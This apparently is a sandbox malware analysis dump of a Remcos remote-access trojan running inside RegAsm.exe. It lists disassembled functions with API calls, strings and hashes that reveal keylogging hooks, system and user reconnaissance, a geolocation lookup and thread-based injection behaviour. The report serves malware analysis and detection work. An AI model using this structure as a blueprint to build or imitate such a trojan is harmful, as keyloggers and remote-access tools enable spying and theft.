                                                                                                                                  • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                                                                                  • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                                                                  • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                                                                                                  Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1802 40a2f3-40a30a 1803 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1802->1803 1804 40a36e-40a37e GetMessageA 1802->1804 1803->1804 1807 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1803->1807 1805 40a380-40a398 TranslateMessage DispatchMessageA 1804->1805 1806 40a39a 1804->1806 1805->1804 1805->1806 1808 40a39c-40a3a1 1806->1808 1807->1808
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                                                                  • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                                                                  • GetLastError.KERNEL32 ref: 0040A328
                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                  • GetMessageA.USER32 ref: 0040A376
                                                                                                                                  • TranslateMessage.USER32(?), ref: 0040A385
                                                                                                                                  • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                                                                  Strings
                                                                                                                                  • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                  • String ID: Keylogger initialization failure: error
                                                                                                                                  • API String ID: 3219506041-952744263
                                                                                                                                  • Opcode ID: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                                                                                                                  • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                                                                                  • Opcode Fuzzy Hash: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                                                                                                                  • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                                                                                                  Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1083526818-0
                                                                                                                                  • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                  • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                  • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                  • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                                  Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                                                                  Strings
                                                                                                                                  • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                  • String ID: http://geoplugin.net/json.gp
                                                                                                                                  • API String ID: 3121278467-91888290
                                                                                                                                  • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                                                                  • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                                                                  • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                                                                  • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                                                                  Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                                                                  • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                                                                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                                                                    • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                                                                    • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                                                                    • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3950776272-0
                                                                                                                                  • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                                                  • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                                                                  • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                                                  • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                                                                  Function 0040F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                                                    • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                                                    • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040F905
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                  • String ID: 5.1.3 Pro$override$pth_unenc
                                                                                                                                  • API String ID: 2281282204-1392497409
                                                                                                                                  • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                                                                  • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                                                                                  • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                                                                  • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                                                                                  Function 0041B890 Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SystemTimes$Sleep__aulldiv
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 188215759-0
                                                                                                                                  • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                                                                  • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                                                                                                  • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                                                                                                  • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                                                                                                  Function 0041B69E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetComputerNameExW.KERNEL32(00000001,?,0000002B,8)3), ref: 0041B6BB
                                                                                                                                  • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$ComputerUser
                                                                                                                                  • String ID: 8)3
                                                                                                                                  • API String ID: 4229901323-783258567
                                                                                                                                  • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                                                  • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                                                                                  • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                                                                  • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                                                                                  Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,0033A208), ref: 004338DA
                                                                                                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1815803762-0
                                                                                                                                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                  • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                                                                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                                                                  • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                                                                  Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                  • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                                                  • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                                                                                  • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                  Function 0040EA00 Relevance: 60.3, APIs: 15, Strings: 19, Instructions: 795COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 101 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->101 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 97 40ec27-40ec3d call 401fab call 4139e4 80->97 89 40ec47-40ec49 81->89 90 40ec4e-40ec55 81->90 93 40ef2c 89->93 94 40ec57 90->94 95 40ec59-40ec65 call 41b354 90->95 93->49 94->95 105 40ec67-40ec69 95->105 106 40ec6e-40ec72 95->106 97->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 101->126 105->106 108 40ecb1-40ecc4 call 401e65 call 401fab 106->108 109 40ec74 call 407751 106->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 117 40ec79-40ec7b 109->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->108 142 40ec9c-40eca2 120->142 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 142->108 143 40eca4-40ecaa 142->143 143->108 146 40ecac call 40729b 143->146 146->108 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 183 40ee4a-40ee54 call 409092 181->183 184 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->184 191 40ee59-40ee7d call 40247c call 434829 183->191 184->191 212 40ee8c 191->212 213 40ee7f-40ee8a call 436f10 191->213 205->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 289 40f01b-40f01d 287->289 290 40f01f 287->290 292 40effe-40f015 call 41ce2c CreateThread 288->292 289->292 293 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->293 292->293 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 293->344 345 40f13c 293->345 306->93 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 357 40f194-40f1a7 call 401e65 call 401fab 346->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 402 40f27b-40f27c SetProcessDEPPolicy 379->402 403 40f27e-40f291 CreateThread 379->403 380->379 402->403 404 40f293-40f29d CreateThread 403->404 405 40f29f-40f2a6 403->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                                                                                    • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                  • String ID: 8)3$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$P2$Remcos Agent initialized$Rmc-IAW1Y3$Software\$User$dMG$del$del$exepath$h{3$licence$license_code.txt
                                                                                                                                  • API String ID: 2830904901-2356374855
                                                                                                                                  • Opcode ID: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                                                                                                                                  • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                                                                                  • Opcode Fuzzy Hash: 3a9e47304c5b1ac1d47b526da143f65d2c8c268b4d4311492a9f71a269f98634
                                                                                                                                  • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                                                                                                                                  Function 00418EB1 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
